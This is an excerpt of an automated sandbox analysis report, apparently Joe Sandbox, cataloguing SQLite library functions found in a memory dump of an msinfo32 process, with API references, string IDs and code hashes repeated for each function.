                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$sqlite3_free$sqlite3_malloc64
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 3361124181-4108050209
                                                                                                              • Opcode ID: 76f40f8394bf4b0be00d186f1c4415716705134d27996028e66d8f00a509400c
                                                                                                              • Instruction ID: c88cc63a11cf28b3331210e5484c2d631648ad0444a7ae343e5b8f41272870a4
                                                                                                              • Opcode Fuzzy Hash: 76f40f8394bf4b0be00d186f1c4415716705134d27996028e66d8f00a509400c
                                                                                                              • Instruction Fuzzy Hash: 3DE13774E042298BDB11CFA8C884B8DBBF1BF88318F25856AD859EB355D774D886CF41
                                                                                                              Function 61E7DA14 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 115COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000004,?,?,61E7E359), ref: 61E7DA53
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E7DAD3
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E7DB22
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_finalize$sqlite3_step
                                                                                                              • String ID: integer$null$real
                                                                                                              • API String ID: 2395141310-2769304496
                                                                                                              • Opcode ID: fc58003ed981922777d92bca5f368a1ed47ce5a3d4571197652846e9ada3a458
                                                                                                              • Instruction ID: 18e903da639a50596a13d04bbefa0523544f6dc4fe6ec3ecdbb2b0947dbca108
                                                                                                              • Opcode Fuzzy Hash: fc58003ed981922777d92bca5f368a1ed47ce5a3d4571197652846e9ada3a458
                                                                                                              • Instruction Fuzzy Hash: 775103B4A08755CFDB14DFA9C08069ABBF0BF88354F25C96DD849AB311D334E841CBA5
                                                                                                              Function 61E920D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                                                                              • String ID: @
                                                                                                              • API String ID: 1503958624-2766056989
                                                                                                              • Opcode ID: 89d856ce4c885793cb692d6c5f3f68e65189f1d1b446e901feb5a37c23d4697d
                                                                                                              • Instruction ID: 13cb9fefcb9897e2a73991adc72ea0f23a215c93c8614e605a4383e8b3c6c27c
                                                                                                              • Opcode Fuzzy Hash: 89d856ce4c885793cb692d6c5f3f68e65189f1d1b446e901feb5a37c23d4697d
                                                                                                              • Instruction Fuzzy Hash: 744100B59157029FDB00DF78C58461EFBE0FB99794F64CA1DE8989B310E734E8848B52
                                                                                                              Function 61E31FEB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E32020
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E32049
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E32056
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32076
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E32080
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3208C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_contextsqlite3_str_append
                                                                                                              • String ID: ,)?
                                                                                                              • API String ID: 2741546359-1010226240
                                                                                                              • Opcode ID: 3de041a8bdba28a14e2bca86cc53cc7c811074f208cc7821f3e43988a8a8ca66
                                                                                                              • Instruction ID: 90a4f7640ef7e525fb378234faefd6ed8263aced173274ada0fcaefa125473a5
                                                                                                              • Opcode Fuzzy Hash: 3de041a8bdba28a14e2bca86cc53cc7c811074f208cc7821f3e43988a8a8ca66
                                                                                                              • Instruction Fuzzy Hash: BD2128B56046468FDB009F69C48465AFBE1EFD8358F25C42EE8A88B301D736E885CF81
                                                                                                              Function 61E37468 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E37480
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E374AD
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E374DE
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3752C
                                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E3753C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                                              • String ID: J
                                                                                                              • API String ID: 3250357221-1141589763
                                                                                                              • Opcode ID: e08629ace59830bd5d51368c735ccc55c1d9cb00c958647de154ede335fb72ef
                                                                                                              • Instruction ID: 913c7ff415b805bed79b49b86be20ac21dfeafd163657aa157dce88910919d91
                                                                                                              • Opcode Fuzzy Hash: e08629ace59830bd5d51368c735ccc55c1d9cb00c958647de154ede335fb72ef
                                                                                                              • Instruction Fuzzy Hash: 31212FB0508B91DFD7149F29C48530ABFE4AFC9728F24CA5DE8A88B395D375C851CB92
                                                                                                              Function 61E372D6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E372EE
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E37319
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3734A
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E37398
                                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E373A8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                                              • String ID: J
                                                                                                              • API String ID: 3250357221-1141589763
                                                                                                              • Opcode ID: 3349bc7792438d7cd4c6a27bebde0c9b98835a8b2332ae155f66b3bc2565bdd4
                                                                                                              • Instruction ID: 961cef3c585cd477e7545f0a99281920b0a23864137b2b0dd2109b4447de0fb4
                                                                                                              • Opcode Fuzzy Hash: 3349bc7792438d7cd4c6a27bebde0c9b98835a8b2332ae155f66b3bc2565bdd4
                                                                                                              • Instruction Fuzzy Hash: 99212FB0508751DBD7109F29C48631ABFE0AFC9728F24CA5DE8A88B389D375C851CB92
                                                                                                              Function 61E906C9 Relevance: 12.3, APIs: 8, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_mutex_entersqlite3_randomness$sqlite3_malloc64sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1657278834-0
                                                                                                              • Opcode ID: 18d116f42646c00297abe194f06fade8d09d826351c078f9f532be6f9de15923
                                                                                                              • Instruction ID: 4fc6bf6ecbaa9f56ab2fedddce1565ea76a1d9c9818d1f0db81e9d5bf4be012e
                                                                                                              • Opcode Fuzzy Hash: 18d116f42646c00297abe194f06fade8d09d826351c078f9f532be6f9de15923
                                                                                                              • Instruction Fuzzy Hash: 98B13775A05249DFCB00CFA9C480A8EB7F5FF49314F68C92AE858AB354D778E941CB90
                                                                                                              Function 61E4B491 Relevance: 12.0, APIs: 8, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_finalize$sqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 83268734-0
                                                                                                              • Opcode ID: 84535eaaf462f666e987c63f9f8611ea60bae4957f2129d740be729030156c64
                                                                                                              • Instruction ID: e666a2c370ee3dd139a8a7c73c98c7a1cff84c53c0486bb2e8731a9469915755
                                                                                                              • Opcode Fuzzy Hash: 84535eaaf462f666e987c63f9f8611ea60bae4957f2129d740be729030156c64
                                                                                                              • Instruction Fuzzy Hash: 8801CC74544B518BCB00BFB8D4C4559FBE4EF48355F12896EDC8A9B30AE734D891CB51
                                                                                                              Function 61E71DDA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 134COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: invalid rootpage$orphan index
                                                                                                              • API String ID: 0-4061570254
                                                                                                              • Opcode ID: dbd0f4d50b9bdc0282d974cbbb6a44a7691d04eb7163e8f1e27f517c76d4f7f3
                                                                                                              • Instruction ID: d086da231da46101264cff5bdd7059a653a91c60d56c80268a060aecb0db064b
                                                                                                              • Opcode Fuzzy Hash: dbd0f4d50b9bdc0282d974cbbb6a44a7691d04eb7163e8f1e27f517c76d4f7f3
                                                                                                              • Instruction Fuzzy Hash: AE515B70604381DFEB24CFA9C0A0A9A7BF1AF99318F24C56DE8998F355D730D881CB51
                                                                                                              Function 61E3B43B Relevance: 10.6, APIs: 7, Instructions: 112COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3B463
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E3B475
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B48B
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B499
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3B57B
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3B586
                                                                                                              • sqlite3_result_error_code.SQLITE3 ref: 61E3B59C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_result_errorsqlite3_result_error_codesqlite3_result_textsqlite3_value_int
                                                                                                              • String ID:
                                                                                                              • API String ID: 2838836587-0
                                                                                                              • Opcode ID: 9f063eeeace50698a316b2cc48916aaba677a574a927e4e990cb6dec4ea98a65
                                                                                                              • Instruction ID: 302bb9082968ad6d5be3c86c56eed102e130b8e86f0936d6dbb57578c8947aa2
                                                                                                              • Opcode Fuzzy Hash: 9f063eeeace50698a316b2cc48916aaba677a574a927e4e990cb6dec4ea98a65
                                                                                                              • Instruction Fuzzy Hash: FB5180B49046599FCB00DFA8C484A9DBBF1AF88354F10C92AE899EB354E734D945CF51
                                                                                                              Function 61E23A0A Relevance: 10.6, APIs: 7, Instructions: 107COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 2264764126-0
                                                                                                              • Opcode ID: 5b59bda16fe9de41a044ed88fd8372dc2b10f65afb776848bdcbce30367d95da
                                                                                                              • Instruction ID: 438678d40c098638388b58a688edd10e6380c7c28259150baf368b9bb61e6418
                                                                                                              • Opcode Fuzzy Hash: 5b59bda16fe9de41a044ed88fd8372dc2b10f65afb776848bdcbce30367d95da
                                                                                                              • Instruction Fuzzy Hash: 1D31A675E0865A8BDB00DFA9C4A029DBBF0EF4D354F25C02AD8A99B311D735D8428F51
                                                                                                              Function 61E3CC51 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3CC9B
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3CCCA
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3CCEF
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_mprintf.SQLITE3 ref: 61E3C5AF
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_result_error.SQLITE3 ref: 61E3C5C5
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_free.SQLITE3 ref: 61E3C5CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                                              • String ID: insert$set
                                                                                                              • API String ID: 832408550-3711289001
                                                                                                              • Opcode ID: 7b39fc057c183d24c9d572c934f227bb7bbed41f593b906431a50ac4dad9374e
                                                                                                              • Instruction ID: 89c357172efc995e1c98afb6c04bcb3ae3c6c8c652ec8594c65fe3b18d9e123c
                                                                                                              • Opcode Fuzzy Hash: 7b39fc057c183d24c9d572c934f227bb7bbed41f593b906431a50ac4dad9374e
                                                                                                              • Instruction Fuzzy Hash: 2731A170B042699BDB01DF68C488B9DBFF5AFC4318F24C41AE8949B354DB35E841CB01
                                                                                                              Function 61E37128 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E37153
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E371B6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_result_error
                                                                                                              • String ID: J
                                                                                                              • API String ID: 497837271-1141589763
                                                                                                              • Opcode ID: 1737f90baf50d2521ae1dc593781d909eda5858255945ce187c6c64706f916a3
                                                                                                              • Instruction ID: 5343296fe35a787279309ef8cc65f4154ccb27a4d6b602c0dc26de6391555b11
